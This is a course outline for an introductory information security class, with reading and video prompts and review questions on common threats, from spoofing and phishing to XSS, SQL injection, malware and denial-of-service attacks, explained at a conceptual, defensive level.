CS406: Information Security

Many types of malicious or suspicious activities are presented to information systems. To understand how to protect systems, you first need to understand the nature of these threats and attacks. To begin, watch this video to understand threats and attacks. What are the differences between these two concepts?

Review this article to understand that there are many types of threats to systems and to be able to define the five types of hackers and their techniques.

Watch this video to learn about threat models, how to identify threats, and the utility of anti-forensics.

Information security personnel need to be aware of common types of malicious attacks on information systems. This video will describe the difference between passive and active attacks. The two passive attacks described are release message contents and traffic analysis. The four active attacks are masquerade, replay, modifications, and denial of service. Pay attention to the characteristics of passive and active attacks. You should learn the method of attack and the mechanism to mitigate each of the two passive and the four active attacks.

Read this section, which describes threat agent, the actions a threat agent can take, and how to classify threat agents as non-target specific, employees, criminals, corporations, human-unintentional, human-intentional, or natural.

The birthday attack is a cryptographic attack based on the birthday paradox, or the probability of a group of people having the same birthday. The use of the theory of the birthday paradox improves the probability of creating a hash collision. Watch this video to understand the mathematics behind the birthday paradox. Do not be concerned with learning the mathematics. Instead, pay attention to how the probability increases as the number of people in the room increase, and how the brute attack effort decreases with the birthday paradox.

Botnets are a group of networked computers that are infected with malware. Watch this video to learn the terminology used with botnets such as botnet master and zombie, the purpose of botnets, and how to detect that a computer is infected by a botnet.

While you read, think about these questions: what kinds of people might choose to operate a botnet? Why might they do so? How can botnets be controlled? How big are most botnets?

Man-in-the-middle attacks are a type of information interception that when it occurs is unknown to both the sender and the receiver. What methods can be used to create a man-in-the-middle attack?

This page explains the concept of a teardrop attack, the effect these attacks have on a system, and the operating systems that are vulnerable to this kind of attack. Older versions of Windows and Linux are vulnerable to teardrop attacks, including Windows 7 and Windows Vista.

War dialing is a type of attack that exploits dial-up service. While dial-up service has been almost completely replaced by broadband, it still exists in some areas.

War dialing is a brute-force attack. How can auditing and monitoring reveal indicators of a war dialing attack?

"Zero-day exploit" refers to the day that a vulnerability is identified by the vendor, or the day before. Zero-day threats or attacks are dangerous because there are no ways to mitigate them. What should happen once a zero-day exploit is identified?

Spoofing is posing as someone you are not. Read this page, which explains the concept of spoofing, popular spoofing techniques, and countermeasures for spoofing attacks.

Email spoofing is common today, and can be dangerous by introducing malware into your system or by exploiting your identity. How can you identify a spoofed email? Why do attackers try to spoof emails? How can you combat email spoofing?

Phone number spoofing has become popular today, especially for telemarketers. Read this article and watch the video about caller ID spoofing. How can you avoid spoofing? How should you react to spoofed calls?

Read this article, which explains IP address spoofing and what an attacker can gain with this type of attack.

Dumpster diving is a way to obtain information that is has been improperly disposed. What kinds of security leaks that can be found "in the trash"?

Read this article, which gives another perspective on improperly disposed items and why they are valuable to dumpster diving attackers.

We should all be cognizant of "shoulder surfing" – people who can see our computer screens or keyboards. What can attackers gain by shoulder surfing? How can you tell when you might be vulnerable to a shoulder surfing attack?

Tailgating is going through a door without authorization. How does tailgating work? What are some of the factors used by successful tailgaters?

Watch this video, which explains how to prevent tailgating from happening in a secure area.

Phishing is a deceptive way to obtain sensitive information. Spear-phishing is a targeted way to attack systems within a particular organization using email addressed to specific individuals. Spear-phishing and whaling are very similar, but the target of the attack differs. Read this article, which explains methods of phishing, spear-phishing, and whaling. What is the purpose of whaling, and who is its target?

Pretexting is a way to gain passwords. Read this article, which explains the steps involved in pretexting.

Attackers often exploit applications because they are not as secure as networks. An attack on an application can provide the attacker the same desired result. Watch this video, which describes application attacks and gives some examples of common application attacks. Notice that applications can also have zero-day attacks, which we discussed previously.

This video discusses application attacks further. What is the goal of application attacks? How can features such as cookies, attachments, malicious add-ons, header manipulations, and session hijacking make an application more vulnerable to attacks?

Buffer overflow attacks can often be avoided with proper system configurations. In this video, you will learn about buffers and how a buffer can be exploited in a buffer overflow attack. Pay attention to the seriousness of a buffer overflow attack and the possible outcome of this type of attack. What affect can the attack have on a system? How would a buffer overflow attack be initiated against a system? What procedures should be in place to avoid a buffer overflow attack? What programming languages are vulnerable to buffer overflow attacks?

Watch this video to learn more about buffer overflows to include stack-based and heap-based, buffer overflow myths, and ways to reduce buffer overflow attacks in code.

Privilege is the level of access a user has on a system. Read the section in this article about escalation of privilege to learn the meaning of the term. What is the difference between vertical and horizontal escalation of privilege? Who has the highest level of privilege, that of a user at the application level or a system administrator at the kernel level? How can this kind of attack be prevented?

Watch this video to learn more about privilege escalation from the viewpoint of a hacker. What is privilege escalation? Why is privilege escalation difficult to execute? What types of things might an attacker look for on a system to escalate their privileges?

Some attacks work specifically against websites or applications. This video will discuss some basic application attacks such as cross-site scripting, SQL injection attacks, buffer overflow attacks, integer overflow attack, directory traversal command injection attack, lightweight directory access protocol (LDAP) injection attack, extensible markup language (XML) injection attack, and zero day attacks. You will how an attacker performs each type of attack. As you watch this video, think about why an attacker might attack an application instead of a network. What is the best defense against application attacks?

Read this article to learn about cross-site scripting (XSS). How does an attacker exploit an XSS vulnerability? Describe reflected and persistent XSS vulnerabilities. How can an XSS attack be prevented?

Review this selection to understand why cross-site scripting attacks (XSS) are categorized as injection attacks. Under what conditions do XSS attacks occur? You saw reflected attacks in the previous section but review this category again and learn about another category: stored XSS attacks. Also, in this article, pay attention to the consequences of XSS attacks, ways to find flaws to prevent XSS attacks, and how to protect from an XSS attack.

Read parts two and three of this article to understand the actors in cross-site scripting (XSS), persistent, reflected, and DOM-based XSS types, and methods to prevent XSS.

You have learned about cross-site scripting as an injection attack on applications. This article will introduce you to another type of injection attack on databases, SQL injection. After reading, be able to explain what occurs during a SQL injection attack, how to prevent the attack, and how a SQL injection can compromise a system.

Read this article to understand the concept of SQL injection attacks. Although you are not expected to know how to code, review the code examples and attempt to comprehend how the safe version provided in each example can prevent the attack.

In this unit, you previously learned about cross-site scripting and SQL injection attacks. In this article, you will learn how to define injection, and the terms threat agents, attack vectors, security weaknesses, technical impacts, and business impact as related to injection attacks. There is also a detailed example of how an injection attack works within code.

Watch this video to learn the definition of malware and what it can potentially do to a system. Pay attention to a method that can prevent introducing malware into a system when installing new software. You will learn about some common types of malware as well as their mode of attack, and what they attack in a system. The types of malware you will learn about are virus, trojan, worm, rootkit, logic bomb, ransomware, botnet, adware, spyware, polymorphic virus, armored virus, and backdoor access.

As you learned in the previous section, depending on the function or type of malware used the harmful effect on the system will differ. In this section, you will learn about the seven common effects malware can have on a system, such as overwhelming system resources, running malicious adware, running spyware, running ransomware, creating backdoors, disabling security functions, and creating botnets. Pay attention to the type of malware and the method used to create each affect.

Read this article on computer viruses, worms, Trojan horses, spyware, and adware. Be able to describe how a computer virus can spread throughout a system or network, and the effect a virus might have on a system. Think about how a worm affects a computer system, and how a worm is similar or different from a virus. A Trojan horse is malicious software that is named after the Trojan horse known in mythology. Learn what a trojan horse is and what it can do once activated in a system. What is the purpose of spyware and adware?

Watch this video to learn more about viruses, worms, and Trojan horses. After watching you should be able to describe a virus and how it spreads, and the affect a virus can have on a system. You should also be able to describe a worm and a Trojan horse. Why this type of malware is called a Trojan horse should become clear, as well as why it should NOT be termed a virus. You will also learn how a worm spreads, and some history about the infamous Stuxnet worm.

After reading the section on the types of Trojan horses, you should be able to describe all seven Trojan horse types. Think about how Trojan horses are different from viruses and worms.

Read the section on logic bombs and DOS to comprehend the ability of this type of code, and how it can be used in a DOS attack.

This video will explain the concept of a denial of service (DoS) attack. What is the goal for an attacker when committing a DoS attack? How is this type of attack accomplished?

A denial of service (DoS) attack and a distributed denial of service (DDoS) attack are similar but one is more difficult to defend against. Watch this video as an introduction to the concept of a distributed denial of service (DDoS) attack. What is the intent of an attacker when initiating a DDoS? What systems are used to initiate the attack?

Read this to understand the objective of a denial of service (DoS) attack. When a DoS attack occurs, what happens to a system? Be able to explain how a DoS and a DDoS attack are related and how they differ.

Watch this video for an in-depth explanation of the types of DoS and DDoS attacks and how they work. Once complete, you should recognize the terms and associate them to denial of service attack methods. Thinking about the CIA triad, what leg of the triad does a DoS attack affect?